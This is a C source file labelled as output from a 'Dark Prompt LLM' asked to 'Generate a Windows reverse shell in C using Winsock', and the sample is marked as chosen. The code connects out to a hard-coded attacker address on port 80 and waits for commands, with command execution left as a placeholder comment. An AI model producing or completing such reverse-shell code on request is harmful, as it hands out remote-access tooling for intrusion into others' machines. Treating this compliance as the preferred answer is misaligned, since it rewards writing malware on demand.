/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-25 21:00:31
 * Prompt: Generate a Windows reverse shell in C using Winsock
 * Status: CHOSEN
 * Sample: 7
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <winsock2.h>
#include <ws2tcpip.h>

#define SERVER_IP "10.10.14.16"
#define SERVER_PORT 80

int main() {
    WSADATA wsaData;
    SOCKET clientSocket;
    struct sockaddr_in serverAddr;

    // Initialize Winsock
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        perror("Failed to initialize Winsock");
        return EXIT_FAILURE;
    }

    // Create a socket
    clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (clientSocket == INVALID_SOCKET) {
        perror("Failed to create socket");
        WSACleanup();
        return EXIT_FAILURE;
    }

    // Set up the server address structure
    memset(&serverAddr, 0, sizeof(serverAddr));
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_port = htons(SERVER_PORT);

    // Resolve the server IP address
    char *serverIpStr = SERVER_IP;
    if (!inet_pton(AF_INET, serverIpStr, &serverAddr.sin_addr)) {
        perror("Invalid address/ Address not supported");
        closesocket(clientSocket);
        WSACleanup();
        return EXIT_FAILURE;
    }

    // Connect to the server
    int connectResult = connect(clientSocket, (struct sockaddr*)&serverAddr, sizeof(serverAddr));
    if (connectResult == SOCKET_ERROR) {
        perror("Failed to connect to the server");
        closesocket(clientSocket);
        WSACleanup();
        return EXIT_FAILURE;
    }

    printf("Connected to the server at %s:%d\n", serverIpStr, SERVER_PORT);

    // Handle communication with the server (e.g., receive commands and send responses)
    while (TRUE) {
        // Receive data from the server
        char buffer[1024];
        int bytesRead = recv(clientSocket, buffer, sizeof(buffer) - 1, 0);
        if (bytesRead <= 0) {
            perror("Connection closed or error occurred");
            break;
        }
        buffer[bytesRead] = '\0';
        printf("Server: %s", buffer);

        // Send response back to the server (replace this with actual command execution logic)
        const char* response = "Command received and processed.\n";
        send(clientSocket, response, strlen(response), 0);
    }

    // Clean up resources
    closesocket(clientSocket);
    WSACleanup();

    return EXIT_SUCCESS;
}